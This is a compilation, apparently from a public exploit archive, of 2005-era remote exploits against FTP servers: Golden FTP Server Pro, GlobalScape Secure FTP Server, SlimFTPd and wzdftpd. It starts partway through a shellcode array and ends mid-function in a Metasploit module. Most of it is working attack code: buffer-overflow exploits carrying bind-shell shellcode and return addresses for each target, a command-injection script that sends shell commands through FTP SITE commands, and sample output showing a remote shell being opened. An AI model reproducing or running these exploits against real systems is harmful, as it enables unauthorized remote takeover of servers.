"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x 52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x 7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\x b5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\x b4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\x d0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\x c6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\x dc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\x a1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x 08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x 7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\x f0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x 7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x 7a\xff\x98";
unsigned int rc,rc2,sock,os,addr ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
unsigned char *recvbuf;
char buffer[size];
char jmp_esp[5];
unsigned short port;
char hex1[] = "\x75\x73\x65\x72\x20";
char hex2[] = "\x70\x61\x73\x73\x20\x61\x61\x61\x61";
char hex3[] = "\x5C\x6E";
char winxpsp1[] = "\x57\x94\xAE\x77"; // shell32.dll :D
char winxpsp2[] = "\xED\x1E\x94\x7C"; // not tested
int main (int argc, char *argv[]){
if(argc < 3) {
printf("\n-------- Golden FTP Server Pro remote stack BOF exploit by c0d3r\n");
printf("-------- usage : golden-ftp.exe host port target\n");
printf("-------- target 1 : windows xp service pack 1 : 0\n");
printf("-------- target 2 : windows xp service pack 2 : 1\n");
printf("-------- eg : golden-ftp.exe 127.0.0.1 80 0\n\n");
exit(-1) ;
}
printf("\n-------- Golden FTP Server Pro remote stack BOF exploit by c0d3r\n\n");
os = (unsigned short)atoi(argv[3]);
switch(os)
{
case 0:
strcat(jmp_esp,winxpsp1);
break;
case 1:
strcat(jmp_esp,winxpsp2); // wasnt checked
break;
default:
printf("\n[-] this target doesnt exist in the list\n\n");
exit(-1);
}
// Creating heart of exploit code
printf("[+] building overflow string");
memset(buffer,NOP,size);
memcpy(buffer,hex1,sizeof(hex1)-1);
memcpy(buffer+337,jmp_esp,sizeof(jmp_esp)-1);
memcpy(buffer+356,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;
// EO heart of exploit code
recvbuf = malloc(256);
memset(recvbuf,0,256);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);
printf("\n[+] attacking host %s\n" , argv[1]) ;
printf("[+] packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf("[+] connected\n") ;
printf("[+] sending the overflow string\n") ;
rc2=recv(sock,recvbuf,256,0);
Sleep(1000);
send(sock,buffer,strlen(buffer),0);
send(sock,"\n",1,0);
rc2=recv(sock,recvbuf,256,0);
Sleep(1000);
send(sock,hex2,strlen(hex2),0);
send(sock,"\n",1,0);
printf("[+] exploit sent successfully !\n");
printf("[+] restart the Ftp server then nc %s 4444\n\n",argv[1]);
}
else {
printf("[-] ouch! Server is not listening .... \n\n");
}
shutdown(sock,1);
closesocket(sock);
}
// EO exploit code
// [2005-04-29]
21 Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (3rd)
/*
\ golden ftp 2.52.0.0 remote r00t exploit
/
\ remote r00t exploit binds 4444 port on remote machine.
/ tested on: winxp sp0 rus
\
/ simple stack overflow in golden ftpd.
\ if retaddr isn't right, ftpd will crash, and admin will be in big shit
/ 'coz ftpd won't start later ;)
\
/ code to be executed, admin must restart or shutdown ftpd... then ftpd will execute eviLDuDe'Z c0de )
\
/ gr33tz: choix, nekd0, xtix, crash-x, coki, rave, antiq, xoce, shi, 'em, lp, spekterX, edisan, c0wboy
\ ilja, esDee, blackhatz.inf0, sk3w
/ p.s }:+ EvILduDe
\ (c) uKt research '04/'05
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
#define RETADDR 0x77F510B0
char shellcode[]= // binds 4444 port
"\xd9\xEE\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\xb1\xbe"
"\x94\x1d\x83\xeb\xfc\xe2\xf4\x4d\x56\xc2\x1d\xb1\x be\xc7\x48\xe7"
"\xe9\x1f\x71\x95\xa6\x1f\x58\x8d\x35\xc0\x18\xc9\x bf\x7e\x96\xfb"
"\xa6\x1f\x47\x91\xbf\x7f\xfe\x83\xf7\x1f\x29\x3a\x bf\x7a\x2c\x4e"
"\x42\xa5\xdd\x1d\x86\x74\x69\xb6\x7f\x5b\x10\xb0\x 79\x7f\xef\x8a"
"\xc2\xb0\x09\xc4\x5f\x1f\x47\x95\xbf\x7f\x7b\x3a\x b2\xdf\x96\xeb"
"\xa2\x95\xf6\x3a\xba\x1f\x1c\x59\x55\x96\x2c\x71\x e1\xca\x40\xea"
"\x7c\x9c\x1d\xef\xd4\xa4\x44\xd5\x35\x8d\x96\xea\x b2\x1f\x46\xad"
"\x35\x8f\x96\xea\xb6\xc7\x75\x3f\xf0\x9a\xf1\x4e\x 68\x1d\xda\x30"
"\x52\x94\x1c\xb1\xbe\xc3\x4b\xe2\x37\x71\xf5\x96\x be\x94\x1d\x21"
"\xbf\x94\x1d\x07\xa7\x8c\xfa\x15\xa7\xe4\xf4\x54\x f7\x12\x54\x15"
"\xa4\xe4\xda\x15\x13\xba\xf4\x68\xb7\x61\xb0\x7a\x 53\x68\x26\xe6"
"\xed\xa6\x42\x82\x8c\x94\x46\x3c\xf5\xb4\x4c\x4e\x 69\x1d\xc2\x38"
"\x7d\x19\x68\xa5\xd4\x93\x44\xe0\xed\x6b\x29\x3e\x 41\xc1\x19\xe8"
"\x37\x90\x93\x53\x4c\xbf\x3a\xe5\x41\xa3\xe2\xe4\x 8e\xa5\xdd\xe1"
"\xee\xc4\x4d\xf1\xee\xd4\x4d\x4e\xeb\xb8\x94\x76\x 8f\x4f\x4e\xe2"
"\xd6\x96\x1d\xa0\xe2\x1d\xfd\xdb\xae\xc4\x4a\x4e\x eb\xb0\x4e\xe6"
"\x41\xc1\x35\xe2\xea\xc3\xe2\xe4\x9e\x1d\xda\xd9\x fd\xd9\x59\xb1"
"\x37\x77\x9a\x4b\x8f\x54\x90\xcd\x9a\x38\x77\xa4\x e7\x67\xb6\x36"
"\x44\x17\xf1\xe5\x78\xd0\x39\xa1\xfa\xf2\xda\xf5\x 9a\xa8\x1c\xb0"
"\x37\xe8\x39\xf9\x37\xe8\x39\xfd\x37\xe8\x39\xe1\x 33\xd0\x39\xa1"
"\xea\xc4\x4c\xe0\xef\xd5\x4c\xf8\xef\xc5\x4e\xe0\x 41\xe1\x1d\xd9"
"\xcc\x6a\xae\xa7\x41\xc1\x19\x4e\x6e\x1d\xfb\x4e\x cb\x94\x75\x1c"
"\x67\x91\xd3\x4e\xeb\x90\x94\x72\xd4\x6b\xe2\x87\x 41\x47\xe2\xc4"
"\xbe\xfc\xed\x3b\xba\xcb\xe2\xe4\xba\xa5\xc6\xe2\x 41\x44\x1d";
int main ( int argc, char *argv[] )
{
WSADATA wsa;
SOCKET sock;
char data[6667], evil[7776];
struct sockaddr_in addr;
printf("\n\n >> Golden FTP Server Pro 2.52.0.0 Remote Root Exploit <<\n :: by darkeagle [unl0ck] ::\n >> http://unl0ck.org <<\n\n");
WSAStartup(MAKEWORD(2,0), &wsa);
if ( argc < 3 )
{
printf(" >usage: %s <ip> <port>\n\n", argv[0]);
exit(0);
}
printf(" ip: %s, port: %d\n", argv[1], atoi(argv[2]));
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
memset(data, 0x00, sizeof(data));
memset(evil, 0x00, sizeof(evil));
memset(data, 0x55, 372);
*(long*)&data[332] = RETADDR;
memcpy(data, &shellcode, sizeof(shellcode));
printf(" [`] connecting...\n");
if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) > 0 ) { printf(" [+] connected\n"); } else { exit(0); }
sprintf(evil, "USER %s\r\nPASS\r\n", data);
Sleep(1000);
send(sock, evil, strlen(evil), 1);
printf(" [+] send. w8ing while ftpd will reboot...\n\n");
closesocket(sock);
WSACleanup();
return 0;
}
// [2005-04-29]
21 GlobalScape Secure FTP Server 3.0 Buffer Overflow Exploit
#!/usr/bin/python
###############################################
# GlobalScape Secure FTP Server Buffer Overflow
# Coded by [email protected]
# http://www.see-security.com
# http://www.hackingdefined.com/exploits/Globalscape30.pdf
###############################################
# EIP Overwrite
# root@[muts]# ./globalscape-3.0-ftp.py
#
# [+] Evil GlobalFTP 3.0 Secure Server Exploit
# [+] Coded by mati [at] see-security [dot] com
# [+] 220 GlobalSCAPE Secure FTP Server (v. 3.0) * UNREGISTERED COPY *
#
# [+] Sending Username
# [+] Sending Password
# [+] Sending evil buffer
# [+] Connect to port 4444 on victim Machine!
#
# root@[muts]# nc -v 192.168.1.153 4444
# [192.168.1.153] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
import socket
import struct
import time
# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
# http://metasploit.com */
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e"
sc +="\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x56\x4b\x58"
sc +="\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x 4b\x58\x4e\x47"
sc +="\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x 4a\x41\x4b\x58"
sc +="\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x 49\x54\x4b\x38"
sc +="\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x 49\x39\x4e\x4a"
sc +="\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x 4d\x50\x41\x30"
sc +="\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x 4a\x42\x45\x57"
sc +="\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x 48\x36\x4b\x58"
sc +="\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x 4b\x4e\x43\x30"
sc +="\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x 41\x56\x43\x4c"
sc +="\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x 4b\x58\x42\x44"
sc +="\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x 42\x54\x4a\x50"
sc +="\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x 42\x35\x4f\x4f"
sc +="\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x 4a\x36\x43\x33"
sc +="\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x 46\x55\x4f\x4f"
sc +="\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x 42\x45\x4f\x4f"
sc +="\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x 4d\x4e\x4a\x50"
sc +="\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x 4a\x36\x49\x4d"
sc +="\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x 43\x45\x43\x45"
sc +="\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x 43\x35\x4f\x4f"
sc +="\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x 43\x35\x49\x38"
sc +="\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x 47\x4c\x47\x55"
sc +="\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x 4f\x4f\x42\x4d"
sc +="\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x 4f\x4f\x48\x4d"
sc +="\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x 49\x44\x48\x38"
sc +="\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x 46\x45\x45\x35"
sc +="\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x 48\x4c\x49\x37"
sc +="\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x 48\x36\x4c\x56"
sc +="\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x 45\x4e\x4c\x56"
sc +="\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x 4c\x36\x46\x54"
sc +="\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x 50\x4f\x44\x54"
sc +="\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x 4c\x47\x4a\x53"
sc +="\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x 43\x4b\x48\x51"
sc +="\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x 47\x35\x44\x35"
sc +="\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x 41\x45\x45\x35"
sc +="\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x 45\x30\x50\x4c"
sc +="\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x 47\x33\x4f\x4f"
sc +="\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x 46\x36\x4f\x4f"
sc +="\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x 50\x4c\x42\x4e"
sc +="\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x 5a"
buffer = '\x41'*2043+ struct.pack("<L",0x7C4FEDBB)+'\x90'*36+sc
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\n[+] Evil GlobalFTP 3.0 Secure Server Exploit"
print "[+] Coded by muts"
connect=s.connect(('192.168.1.153',21))
d=s.recv(1024)
print "[+] " +d
print "[+] Sending Username"
time.sleep(1)
s.send('USER muts\r\n')
s.recv(1024)
print "[+] Sending Password"
time.sleep(1)
s.send('PASS muts\r\n')
s.recv(1024)
print "[+] Sending evil buffer"
time.sleep(1)
s.send(buffer+'r\n')
print "[+] Connect to port 4444 on victim Machine!\n"
except:
print "Can't connect to ftp"
# [2005-05-01]
21 SlimFTPd <= 3.16 Remote Buffer Overflow Exploit
/*
*
* Written by redsand
* <[email protected]>
*
* Jul 22, 2005
* Vulnerable: SlimFtpd v3.15 and v3.16
* origional vuln found by:
*
* Usage: ./redslim 127.0.0.1 [# OS RET ]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN
#include <winsock2.h>
#include <windows.h>
// #pragma lib <ws2_32.lib> // win32-lcc specific
#pragma comment(lib, "ws2_32.lib") // ms vc++
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define USERNAME "anonymous"
#define PASSWORD "[email protected]"
// buf size = 512 + max
#define NOP 0x90
#define BUFSIZE 2048
#define PORT 21
#define LSZ 525
unsigned char *login [] = { "USER "USERNAME"\r\n", "PASS "PASSWORD"\r\n", "LIST ", "XMKD AAAAAAAA\r\n", "CWD AAAAAAAA\r\n", NULL };
unsigned char *targets [] =
{
"Windows XP SP0/SP1 ",
"Windows XP SP2 ",
"Windows 2000 SP1/SP4 ",
"Windows 2003 Server SP1",
"Denial-of-Service",
NULL
};
unsigned long offsets [] =
{
// jmp esi
0x71a5b80b, // Windows XP 5.1.1.0 SP1 (IA32) Windows XP 5.1.0.0 SP0 (IA32)
0x77f1a322, // Windows XP 5.1.2.0 SP2 (IA32)
0x74ffbb65, // Windows 2000 5.0.1.0 SP1 (IA32) Windows 2000 5.0.4.0 SP4 (IA32)
0x77f7fe67, // Windows 2003 Server 5.2.1.0 SP1 (IA32)
0x44434241,
0
};
unsigned char shellcode[] = "\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
long gimmeip(char *);
void keepout();
void shell(int);
void keepout() {
#ifdef WIN
WSACleanup();
#endif
exit(1);
}
void banner() {
printf("- SlimFtpd v3.15 and v3.16 remote buffer overflow\n");
printf("- Written by redsand (redsand [at] redsand.net)\n");
}
void usage(char *prog) {
int i;
banner();
printf("- Usage: %s <target ip> <OS> [target port]\n", prog);
printf("- Targets:\n");
for (i=0; targets[i] != NULL; i++)
printf("\t- %d\t%s\n", i, targets[i]);
printf("\n");
exit(1);
}
/************************************************** *************/
long gimmeip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
keepout();
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
int main(int argc, char *argv[]) {
int sock;
char expbuff[BUFSIZE];
char recvbuff[BUFSIZE];
void *p;
unsigned short tport = PORT; // default port for ftp
struct sockaddr_in target;
unsigned long retaddr;
int len,i=0;
unsigned int tar;
#ifdef WIN
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0), &wsadata);
#endif
if(argc < 3) usage(argv[0]);
if(argc == 4)
tport = atoi(argv[3]);
banner();
tar = atoi(argv[2]);
retaddr = offsets[tar];
printf("- Using return address of 0x%8x : %s\n",retaddr,targets[tar]);
printf("\n[+] Initialize socket.");
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("[x] Error socket. Exiting...\n");
keepout();
}
memset(&target,0x00,sizeof(target));
target.sin_family = AF_INET;
target.sin_addr.s_addr = gimmeip(argv[1]);
target.sin_port = htons(tport);
printf("\n[+] Prepare exploit buffer... ");
memset(expbuff, 0x00, BUFSIZE);
memset(recvbuff, 0x00, BUFSIZE);
memcpy(expbuff, login[2], strlen(login[2]));
p = &expbuff[strlen(login[2]) ];
memset(p, NOP, LSZ);
memcpy(&expbuff[10],shellcode,sizeof(shellcode)-1);
*(unsigned long *)&expbuff[507] = retaddr;
p = &expbuff[511];
memcpy(p, "\n",1);
printf("\n[+] Connecting at %s:%hu...", argv[1], tport);
fflush(stdout);
if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {
fprintf(stderr,"\n[x] Couldn't establish connection. Exiting...\n");
keepout();
}
printf(" - OK.\n");
len = recv(sock, recvbuff, BUFSIZE-1, 0);
if(len < 0) {
fprintf(stderr,"\nError response server\n");
exit(1);
}
printf(" - Size of payload is %d bytes",strlen(expbuff));
printf("\n[+] Initiating exploit... ");
printf("\n - Sending USER...");
if(send(sock,login[0],strlen(login[0]),0)==-1) {
fprintf(stderr,"\n[-] Exploit failed.\n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE-1,0);
if(len < 0) {
fprintf(stderr,"\nError recv.");
exit(1);
}
recvbuff[len] = 0;
printf("\n - Sending PASS...");
if(send(sock,login[1],strlen(login[1]),0)==-1) {
printf("\n[-] Exploit failed.\n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE, 0);
if(len < 0) {
fprintf(stderr,"\nError recv.");
exit(1);
}
recvbuff[len] = 0;
printf("\n - Creating X-DIR...");
if(send(sock,login[3],strlen(login[3]),0)==-1) {
printf("\n[-] Exploit failed.\n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE, 0);
if(len < 0) {
fprintf(stderr,"\nError recv.");
exit(1);
}
recvbuff[len] = 0;
if(send(sock,login[4],strlen(login[4]),0)==-1) {
printf("\n[-] Exploit failed.\n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE, 0);
if(len < 0) {
fprintf(stderr,"\nError recv.");
exit(1);
}
recvbuff[len] = 0;
printf("\n - Sending Exploit String...");
if(send(sock,expbuff,strlen(expbuff),0)==-1) {
printf("\n[-] Exploit failed.\n");
keepout();
}
printf("- OK.");
printf("\n[+] Now try to connect to the shell on %s:101\n", argv[1] );
#ifdef WIN
closesocket(sock);
WSACleanup();
#else
close(sock);
#endif
return(0);
}
// [2005-07-25]
21 WzdFTPD <= 0.5.4 Remote Command Execution Exploi
################################################## ####
# 0day0day0day0day0day0day0day
# -------------------------------
# wzdftpd remote exploit by kcope
# nice call to popen(3) on custom
# site commands...
#
# August 2005
# confidential! keep private!
# -------------------------------
# 0day0day0day0day0day0day0day
#
# .___ _____ __ .___
#__ _ __________ __| _// ____\/ |_______ __| _/
#\ \/ \/ /\___ // __ |\ __\\ __\____ \ / __ |
# \ / / // /_/ | | | | | | |_> > /_/ |
# \/\_/ /_____ \____ | |__| |__| | __/\____ |
# \/ \/ |__| \/
#
#__ _ _______ _______ ____ ________
#\ \/ \/ /\__ \\_ __ \_/ __ \\___ /
# \ / / __ \| | \/\ ___/ / /
# \/\_/ (____ /__| \___ >_____ \
# \/ \/ \/ VER1
################################################## ####
use Net::FTP;
sub usage {
print "usage: wzdftpdwarez.pl remote_host remote_port user pass custom_site_command\n"
."default guest account for wzdftpd is username/password: guest/%\n";
}
print "
wzdftpd remote exploit by kcope
August 2005
confidential! keep private!
";
if ($#ARGV < 4) {
usage();
exit();
}
$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$sitecmd = $ARGV[4];
$ftp = Net::FTP->new(Host => $host, Port => $port, Debug => 0)
or die "Cannot connect to $host: $@";
$ftp->login($user, $pass)
or die "Cannot login ", $ftp->message;
print "Now you can type commands, hopefully as r00t!\n";
while(1) {
print "!\$%&#>";
$cmd=<stdin>;
$ftp->site($sitecmd, "|$cmd;");
print $ftp->message();
}
# [2005-09-24]
21 WzdFTPD <= 0.5.4 (SITE) Remote Command Execution Exploit (meta)
# Reference: http://www.enigmagroup.org/id.php?id=1231 (kcope) /str0ke
#
# Metasploit plugin for: Wzdftpd SITE Command Arbitrary Command Execution
# 2005 11 26 - David Maciejak
#
package Msf::Exploit::wzdftpd_site;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info = {
'Name' => 'Wzdftpd SITE Command Arbitrary Command Execution',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'David Maciejak <david dot maciejak at kyxar dot fr>' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'DATA', 'Username', 'guest'],
'PASS' => [1, 'DATA', 'Password', '%'],
'SITECMD'=> [1, 'DATA', 'Custom site command'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits an arbitrary command execution vulnerability in Wzdftpd
threw SITE command. Wzdftpd version to 0.5.4 are vulnerable.
}),
'Refs' =>
[
['BID', '14935'],
],
'Payload' =>
{
'Space' => 128,
'Keys' => ['cmd','cmd_bash'],
},
'Keys' => ['wzdftpd_site'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
my $res = $s->Recv(-1, 5);
$s->Close();
if (! $res) {
$self->PrintLine(" No FTP banner");
return $self->CheckCode('Unknown');
}
if ($res =~ /220 wzd server ready/)
{
$self->PrintLine(" FTP Server is a wzdftpd server");
return $self->CheckCode('Appears');
}
else
{
$self->PrintLine(" FTP Server is probably not vulnerable");
return $self->CheckCode('Safe');
}
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $custom_site_cmd=$self->GetVar('SITECMD');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $cmd = $encodedPayload->RawPayload;
my $user = $self->GetVar('USER');
my $pass = $self->GetVar('PASS');
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError){
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(" Establishing a connection to the FTP server ...");
$s->Send("USER ".$user);
my $result = $s->Recv(-1, 20);
